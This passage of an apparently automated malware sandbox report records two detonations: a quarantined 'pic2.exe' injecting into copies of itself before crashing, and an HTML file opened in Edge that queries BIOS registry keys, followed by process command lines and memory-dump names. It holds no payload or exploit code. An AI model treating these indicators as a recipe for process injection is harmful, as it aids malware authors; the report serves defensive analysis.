PID 2288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2788 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2788 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2788 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2788 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2288 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2288 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2288 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2288 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 148

Network

N/A

Files

memory/2288-0-0x000000007408E000-0x000000007408F000-memory.dmp

memory/2288-1-0x0000000000FC0000-0x000000000101A000-memory.dmp

memory/2788-13-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2788-11-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2788-15-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2788-9-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2788-7-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2788-5-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2788-4-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2788-3-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2288-16-0x0000000074080000-0x000000007476E000-memory.dmp

memory/2288-17-0x000000007408E000-0x000000007408F000-memory.dmp

memory/2288-18-0x0000000074080000-0x000000007476E000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

144s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5092 wrote to memory of 888 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 888 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 860 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 860 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5092 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffd7fdc46f8,0x7ffd7fdc4708,0x7ffd7fdc4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

